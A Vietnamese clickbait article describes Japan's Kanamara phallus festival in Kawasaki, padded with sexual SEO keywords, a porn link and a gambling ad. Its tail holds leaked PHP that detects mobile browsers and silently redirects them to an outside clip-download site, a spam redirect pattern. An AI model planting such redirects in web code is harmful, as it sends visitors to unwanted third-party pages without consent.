Choáng: Xem lễ hội tôn vinh “của quý” của Nhật Bản đầu năm mới

Filed under: TIN SHOCK 9X |

le hoi tinh duc o nhat ban, phim le hoi tinh duc o nhat ban, video le hoi tinh duc o nhat ban, ảnh se, lễ hội tình dục ở nhật bản, tin nong le hoi tinh duc o nhat ban, clip le hoi tinh duc o nhat ban, xem vi deo le hoi tinh duc o nhat ban, canh le hoi tinh duc o nhat ban, ngay le hoi tinh duc o nhat ban, xem clip se, le hoi tinh duc o nhat ban, nhung le hoi tinh duc o nhat ban, của quý của Nhật Bản, của quý nhat ban, duong vat cua quy sex, hinh trai teen khoe cua quy, hot boy 9, va cua quy, le hoi của quý, tôn vinh “của quý”, Xem lễ hội
Lễ hội “của quý” là lễ hội truyền thống ở xứ sở mặt trời mọc nhằm tôn vinh sinh thực khí nam đồng thời tuyên truyền việc phòng chống HIV/AIDS.

Những người mới nghe qua không khỏi giật mình ngạc nhiên bởi cái tên kỳ quái của lễ hội. Lễ hội sinh thực khí nam của Nhật Bản này vốn xuất phát từ một nghi lễ ăn mừng chiến thắng sau khi những người dân Nhật Bản cổ xưa đã tiêu diệt được một con quỷ cái có răng nanh chuyên cắn vào bộ phận sinh dục của nam giới.

 

Những biểu tượng mang tính chất tượng trưng nhưng không mang ý nghĩa dung tục

Kanamara tiếng Nhật nghĩa là “một sinh thực khí khổng lồ bằng kim loại”. Lễ hội dị thường này được tổ chức hàng năm tại đền Wakamiya Hachimangu ở thành phố Kawasaki. Ngôi đền này được xây dựng để vinh danh Đấng thần linh Sắt Thép, bởi sắt thép được lấy từ đây được các vị sư chế tác thành các mô hình sinh thực khí nam khổng lồ có thể tiêu diệt được bọn quỷ dữ chuyên quấy nhiễu ngôi đền.

Hoạt động chính của lễ hội bao gồm việc trưng bày và diễu hành các tượng và mô hình điêu khắc “của quý” truyền thống làm từ “daikon” (một loại củ cải khổng lồ của Nhật), các tượng chạm trổ hình sinh thực khí “siêu bự”. Du khách tham quan có thể trèo lên các tượng này để được “tận mục sở thị”. Việc chạm vào những biểu vật thiêng liêng của lễ hội này sẽ đem lại may mắn và an lành cho du khách. Sự phấn khích là điều bạn dễ nhận thấy ở du khách khi đã đến với lễ hội này.

Sờ vào “cái ấy” sẽ đem lại may mắn, an lành… Chị em thì không bao giờ bỏ lỡ cơ hội được cưỡi lên “cái ấy”.

Rất nhiều cây kẹo mút với hình dáng nhậy cảm được bầy bán phục vụ du khách. Không chỉ giới trẻ thành phố Kawasaki và du khách thích thú khi tham gia lễ hội này mà còn rất nhiều các bậc cao niên cũng không kém phần háo hức để hòa mình vào lễ hội vừa đầy màu sắc tôn nghiêm lại vừa thú vị này.

Du khách trẻ hết sức phấn khích.

 

Du khách già cũng không kém phần tươi vui…

Xuyên suốt lễ hội là các màn trình diễn điệu vũ truyền thống của địa phương kết hợp với diễu hành trống nghi thức. Đỉnh điểm của lễ hội là màn rước ba chiếc kiệu có mô hình sinh thực khí nam về đền sau khi đã diễu hành khắp thành phố.

Vào thời Edo, khu vực tọa lạc của ngôi đền vốn là một khu nhà thổ “trứ danh”. Vì vậy, ngày nay các cô gái bán hoa cũng nườm nượp kéo về đây vào dịp lễ hội để cầu nguyện “sức khỏe” và không bị mắc các bệnh lây qua đường tình dục. Nơi đây còn là chốn nguyện cầu linh thiêng cho những đôi trai gái yêu nhau, những cặp vợ chồng hiếm muộn và các cặp uyên ương đồng tính. Lễ hội này còn là dịp để quyên góp quỹ phòng chống HIV-AIDS.

Những món quà lưu niệm “độc đáo” tại lễ hội rất đáng để du khách đem về làm quà tặng cho người thân…

 

AIDS, Chuyện lạ, của quý, HIV, Kawasaki, lễ hội của quý, Nhật Bản, Thư giãn, Wakamiya Hachimangu

 

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88